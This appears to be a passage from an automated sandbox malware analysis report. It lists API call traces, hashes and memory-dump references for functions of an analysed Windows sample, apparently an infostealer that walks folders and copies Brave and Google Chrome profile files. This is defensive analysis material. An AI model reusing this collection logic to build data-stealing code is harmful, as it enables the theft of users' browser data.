                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: ee15be7aa53c9f93506023f35057704dc12838680b04e1eec301e3214e7a44c5
                            • Instruction ID: 08d01d66afb0d3759a98f2839877cb1fc1956f4ac1919d20a8d9ec53cc8035fa
                            • Opcode Fuzzy Hash: ee15be7aa53c9f93506023f35057704dc12838680b04e1eec301e3214e7a44c5
                            • Instruction Fuzzy Hash: BBA2A271A002169FEB21AF75CE88AAF77B9AF04704F54512AF845E3351DBB8DD018B68
                            Function 004316A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004316E2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043176C
                            • lstrcat.KERNEL32(00000000), ref: 00431776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004317F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431875
                            • lstrcat.KERNEL32(00000000), ref: 0043187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004318AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 004318F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004318FE
                            • lstrlen.KERNEL32(00461794), ref: 00431909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431929
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431966
                            • lstrlen.KERNEL32(\*.*), ref: 00431971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0043199A
                              • Part of subcall function 00454040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0045406D
                              • Part of subcall function 00454040: lstrcpy.KERNEL32(00000000,?), ref: 004540A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004319C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431A16
                            • lstrlen.KERNEL32(00461794), ref: 00431A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431A41
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431A81
                            • lstrlen.KERNEL32(00461794), ref: 00431A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431AAC
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00431B45
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 00431B70
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00431B8A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431C03
                            • lstrlen.KERNEL32(00461794), ref: 00431C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431C31
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431C74
                            • lstrlen.KERNEL32(00461794), ref: 00431C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431CA2
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431CAE
                            • lstrlen.KERNEL32(?), ref: 00431CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431CE9
                            • lstrlen.KERNEL32(00461794), ref: 00431CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431D14
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431DEB
                            • lstrlen.KERNEL32(00461794), ref: 00431DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431E19
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00431E56
                            • lstrlen.KERNEL32(00461794), ref: 00431E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431E81
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00431E8D
                            • lstrlen.KERNEL32(?), ref: 00431E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00431EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00431F45
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431F9F
                            • lstrlen.KERNEL32(00FF91A0), ref: 00431FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431FE3
                            • lstrlen.KERNEL32(00461794), ref: 00431FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043200E
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00432042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043204D
                            • lstrlen.KERNEL32(00461794), ref: 00432058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432075
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: e0894bab9d36882fcf059d2d1c0c14b608198725a1287ae96436ef4a4f720bd4
                            • Instruction ID: 845857960eb6a0b2ceaff002e4eb1890ce0b9b7290119d8ae37515d2855bbdec
                            • Opcode Fuzzy Hash: e0894bab9d36882fcf059d2d1c0c14b608198725a1287ae96436ef4a4f720bd4
                            • Instruction Fuzzy Hash: 7A929771A012169FCB21EF75DD84AAF77B9AF08304F14612AF805A7361DBB8DD05CBA4
                            Function 0043DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DBEF
                            • lstrlen.KERNEL32(00464CA8), ref: 0043DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC17
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 0043DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DC4C
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DC8F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0043DCD0
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0043DCF0
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0043DD0A
                            • lstrlen.KERNEL32(0045CFEC), ref: 0043DD1D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DD7B
                            • lstrlen.KERNEL32(00461794), ref: 0043DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDA3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DDAF
                            • lstrlen.KERNEL32(?), ref: 0043DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 0043DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DE19
                            • lstrlen.KERNEL32(00461794), ref: 0043DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DE6F
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DE7B
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DEBB
                            • lstrlen.KERNEL32(00461794), ref: 0043DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043DEE6
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DEF2
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFA5
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043DFB1
                            • lstrlen.KERNEL32(00FF9370), ref: 0043DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043DFF4
                            • lstrlen.KERNEL32(00461794), ref: 0043DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E022
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043E02E
                            • lstrlen.KERNEL32(00FF91B0), ref: 0043E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 0043E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0043E0E7
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E11F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E155
                            • lstrcat.KERNEL32(00000000,?), ref: 0043E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E19F
                            • lstrcat.KERNEL32(00000000), ref: 0043E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E1F9
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E22F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E261
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 0043E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 0043E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0043E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E349
                            • DeleteFileA.KERNEL32(?), ref: 0043E381
                            • StrCmpCA.SHLWAPI(?,00FFDCC0), ref: 0043E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E445
                            • StrCmpCA.SHLWAPI(?,00FF91B0), ref: 0043E468
                            • StrCmpCA.SHLWAPI(?,00FF9370), ref: 0043E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0043E4E0
                            • StrCmpCA.SHLWAPI(?,00FFDC00), ref: 0043E58E
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0043E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0043E776
                            • DeleteFileA.KERNEL32(?), ref: 0043E7D2
                            • StrCmpCA.SHLWAPI(?,00FF9240), ref: 0043E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043E952
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: 8dd82fb5779f4737a56e41939b4ec9eba76ac2a9fe9b15033675cdd8128c9009
                            • Instruction ID: 95f0fc8eb21e2703fa70e619154e494707d2cc4a6e9fa041821d9e5d5f534846
                            • Opcode Fuzzy Hash: 8dd82fb5779f4737a56e41939b4ec9eba76ac2a9fe9b15033675cdd8128c9009
                            • Instruction Fuzzy Hash: 5E92C071A012069FCB20EF75DD89AAF77B9AF08304F14652AF845A3391DB78DC058BA4
                            Function 004418A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004418D2
                            • lstrlen.KERNEL32(\*.*), ref: 004418DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 004418FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0044190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00441947
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 00441967
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441981
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004419BF
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004419F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A4C
                            • lstrlen.KERNEL32(00461794), ref: 00441A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A80
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AB4
                            • lstrlen.KERNEL32(?), ref: 00441AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00441AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B19
                            • lstrlen.KERNEL32(00FF9110), ref: 00441B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B8F
                            • lstrlen.KERNEL32(00461794), ref: 00441BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441BC3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C57
                            • lstrlen.KERNEL32(00461794), ref: 00441C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C8B
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D21
                            • lstrlen.KERNEL32(00461794), ref: 00441D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D55
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00441DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DED
                            • lstrlen.KERNEL32(00461794), ref: 00441E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E36
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E68
                            • lstrlen.KERNEL32(00FFDDE0), ref: 00441E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EB2
                            • lstrlen.KERNEL32(00461794), ref: 00441EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EE3
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F15
                            • lstrlen.KERNEL32(00FFE330), ref: 00441F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F5F
                            • lstrlen.KERNEL32(00461794), ref: 00441F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F90
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441FC2
                            • lstrlen.KERNEL32(00FEA698), ref: 00441FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442036
                            • lstrlen.KERNEL32(00461794), ref: 00442048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442067
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00442073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442098
                            • lstrlen.KERNEL32(?), ref: 004420AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004420D0
                            • lstrcat.KERNEL32(00000000,?), ref: 004420DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442103
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044213F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0044214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00442176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442181
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: d2712563ecf9e06139c3f7cc3f011b8bce1b4c319ce6c04eb1d4960ae7f07588
                            • Instruction ID: e17e902a9223d70404b2dae523a76d29e861a548a64d7daa00db1859158b83b2
                            • Opcode Fuzzy Hash: d2712563ecf9e06139c3f7cc3f011b8bce1b4c319ce6c04eb1d4960ae7f07588
                            • Instruction Fuzzy Hash: F162E770A116169BDB21EF75CD48AAFB7BAAF44704F04112AF80593361DBBCDD41CBA8
                            Function 00443910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0044392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00443943
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044396C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00443986
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004439BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004439E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004439F2
                            • lstrlen.KERNEL32(00461794), ref: 004439FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A1A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443A26
                            • lstrlen.KERNEL32(?), ref: 00443A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00443A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443A8A
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00443ACE
                            • lstrlen.KERNEL32(?), ref: 00443AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B36
                            • lstrlen.KERNEL32(00461794), ref: 00443B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B6A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443B9E
                            • lstrlen.KERNEL32(?), ref: 00443BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00443BE0
                            • lstrlen.KERNEL32(00FF91A0), ref: 00443C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443C3C
                            • lstrlen.KERNEL32(00FF9110), ref: 00443C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443CB7
                            • lstrlen.KERNEL32(00461794), ref: 00443CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443CE8
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00443D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00443D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443D79
                            • lstrlen.KERNEL32(00461794), ref: 00443D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00443DAD
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00443DB9
